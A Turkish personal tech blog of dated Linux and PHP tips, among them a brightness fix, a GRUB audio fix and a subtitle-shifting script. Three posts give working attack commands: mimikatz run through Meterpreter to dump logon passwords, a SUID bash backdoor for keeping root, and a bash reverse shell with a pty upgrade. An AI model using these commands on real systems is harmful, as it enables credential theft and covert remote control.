30 Ocak 2016 Cumartesi

Linux Komut Satırından Ekran Parlaklığını Değiştirmek

Her nasıl başardıysam ekran parlaklığını sıfıra indirdim ve simsiyah bir ekranda kaldım. Üstelik ekran parlaklığını arttımak ve azaltmak için kullandığım klavye kısa yol tuşlarının çalışmadığını fark ettim... Tamamen karanlık bir ekranla başbaşa kalmış oldum..

Bu durumdayken SSH ile diz üstü bilgisayarıma bağlanarak aşağıdaki komutu verdim ve ekran parlaklığının okunabilir bir seviyeye yükselmesini sağladım.

echo 400 > /sys/class/backlight/intel_backlight/brightness

Yine lazım olursa diye bu komutu buraya not almış olalım :)

12 Ocak 2016 Salı

Meterpreter için Komut ile Mimikatz Çalıştırmak

Metasploit içerisinden mimikatz çalıştırmak ve parolaların açık halini almak için aşağıdaki tek satırlık komutu kullanabiliriz.

meterpreter > execute -H -i -c -m -f /tmp/mimi/mimikatz.exe -a  '"sekurlsa::logonPasswords full" exit'

2 Ocak 2016 Cumartesi

Audio Playback Too Fast Over HDMI on Linux

HDMI çıkışından TV bağlantısı yaptıktan sonra seslerin olması gerekenden daha hızlı oynatıldığını fark ettim. Bu durum ilk başta komik gelse bile bir süre sonra çözüm bulamadığınızda sinir bozucu oluyor...

Çözüm için ise Asus N550 dizüstü bilgisayarıma kurulu olan Mint üzerinde aşağıdaki ayarları yaptım ve sorunun düzeldiğini gördüm :)

Öncelikle en sevdiğiniz metin editörüyle /etc/default/grub dosyasını açalım...

gedit /etc/default/grub

Aşağıdaki satırı bulalım;

GRUB_CMDLINE_LINUX_DEFAULT="quiet splash" 

 aşağıdaki gibi değiştirelim...

GRUB_CMDLINE_LINUX_DEFAULT="quiet splash i915.disable_power_well=0" 
Şimdi update-grub komutunu verelim ve sistemi yeniden başlatalım....

update-grub
reboot

8 Aralık 2015 Salı

Suid Backdoor

Öncelikle root yetkilerine sahip olmuş olmanız gerekiyor. Nasıl root olacağınız bu yazının dışında kalan bir konu. Biz root olduktan sonrası ile ilgileniyoruz :-)

İlk olarak aşağıdaki komutlarla bash kabuğunun bir kopyasını alalım. Ben kendi ev dizinime kopyalamayı tercih ettim. Daha sonra chmod ile suid olarak ayarlayalım.

mordor ~ # cp /bin/bash ~harun/backdoor
mordor ~ # chmod +s ~harun/backdoor

Artık  suid arkakapımız hazır. Bundan sonra yapmamız gereken -p parametresi ile ev dizinimize aldığımız suid bash kabuğumuzun kopyasını çalıştırmak olacak…

harun@mordor ~ $ whoami
harun
harun@mordor ~ $ ./backdoor -p
harun@mordor ~ # whoami
root

2 Aralık 2015 Çarşamba

Bir Dizin Altındaki PHP Dosyalarının Çalıştırılmasını Engellemek

Web sunucunuzdaki bir dizin ve altındaki dizinlerdeki PHP dosyalarının çalıştırılmadan doğrudan kullanıcıya gönderilmesi için .htaccess dosyası oluşturup içerisinde aşağıdakileri yazmak yeterli olacaktır...

RemoveHandler .php .phtml .php3
RemoveType .php .phtml .php3
php_flag engine off

Bu ayardan sonra PHP kodlarınızın yorumlanmadan kullanıcılara gönderileceğini ve kaynak kodunuzun doğrudan kullanıcılar tarafından görülebileceğini unutmayın... 

25 Kasım 2015 Çarşamba

Bash Reverse Shell ile Terminal Almak

Bash ile reverse shell almak için aşağıdaki komut kulanılabilir. Bu komut 10.0.0.100 IP adresinin 8080 portuna bağlantı sağlayacak ve bash kabuğunun kullanılmasına izin verecektir.

/bin/bash -c '/bin/bash -i >& /dev/tcp/10.0.0.100/8080 0>&1' > /dev/null

Elde edilen bu komut satırı gerçek bir terminal gibi davranmadığından interafktif işlemlerde aşağıdaki gibi "Pseudo-terminal will not be allocated because stdin is not a terminal." hatası verecekir.

gondor ~ # ssh root@192.168.100.100
ssh root@192.168.100.100
Pseudo-terminal will not be allocated because stdin is not a terminal.

Bu durumda python pty.spawn ile gerçek bir terminal başlatmayı deneyebiliriz. Bunun için aşağıdaki gibi bir komut vermek yeterli olacaktır.

/usr/bin/python -c 'import pty; pty.spawn("/bin/bash")'


22 Kasım 2015 Pazar

PHP ile Altyazı Dosyalarını Düzenlemek ve Senkron Kaymasını Çözmek

Altyazılı film izlerken en çok can sıkan meselelerden birisi altyazıda senkron kayması olması ve altyazıların konuşmalardan farklı zamanlarda gelmesidir. Bu sorun video oynatıcı üzerinden ayarlama yapılarak giderilebilir ancak bazen bu mümkün olmaz...

Yine böyle bir durumda altyazı ve konuşmalar arasındaki farkın yaklaşık 30 sn olduğu bir durumda altyazı dosyasını düzenleyerek tüm zamanları 30 sn kaydırmayı ve senkronu sağlamayı düşündüm. Elimdeki altyazı dosyası aşağıdaki formattaydı...

1
00:01:49,067 --> 00:01:52,064
Ne zaman karşılıklı yarışacağız?

2
00:01:54,562 --> 00:01:57,259
Gunma'daki tüm sürücüler
yenildikten sonra,
 
Bu dosyayı okuyup zamanların üzerine 30sn ekleyecek ve çıktıyı ekrana basacak bir PHP betiği yazmaya karar verdim ve apartopar aşağıdaki kodları yazdım ve yeni altyazı dosyası oluşturdum... :)

 <?php
$file="x.srt"; #Okunacak altyazı dosyası

$f=file_get_contents($file);
$f2=(explode("\n", $f));

foreach($f2 as $l){
    $l = trim($l);
    if(preg_match("/^[0-9]{2}:[0-9]{2}:[0-9]{2},[0-9]{3} --> [0-9]{2}:[0-9]{2}:[0-9]{2},[0-9]{3}/",$l)){
            list($t1,$tmp,$t2)=explode(" ",$l);
            list($saat1,$kuyruk1)=explode(",",$t1);
            list($saat2,$kuyruk2)=explode(",",$t2);
            $q = strtotime("$saat1")+30; #30 sn ekleyelim...
            $ysaat = date('H:i:s', $q) .",$kuyruk1";
            $q2 = strtotime("$saat2")+30; #30 sn ekleyelim...
            $ysaat2 = date('H:i:s', $q2) .",$kuyruk2";
            echo "$ysaat --> $ysaat2\n";
    }else{
        echo "$l\n";   
    }
}
?>

Daha sonra bu betiği altyazı.php adıyla kayıt edip aşağıdaki gibi çalıştırarak yeni altyazı dosyamı elde ettim...

harun@gondor ~ $ php -f altyazi.php > yeni.srt

Yeni dosyamın içeriği aşağıdaki gibi oldu ve senkron sorunum ortadan kalktı... :)

1
00:02:21,067 --> 00:02:24,064
Ne zaman karşılıklı yarışacağız?

2
00:02:26,562 --> 00:02:29,259
Gunma'daki tüm sürücüler
yenildikten sonra,

Bunu yapmanın muhakkak daha iyi bir yolu vardır. Ancak ben aklıma ilk gelen hızlı ve kirli çözümle film keyfine gölge düşürecek bir altyazı sorununu çözmüş oldum... Daha sonra yine lazım olduğunda bulabileyim diye kodları buraya not alıyorum... :)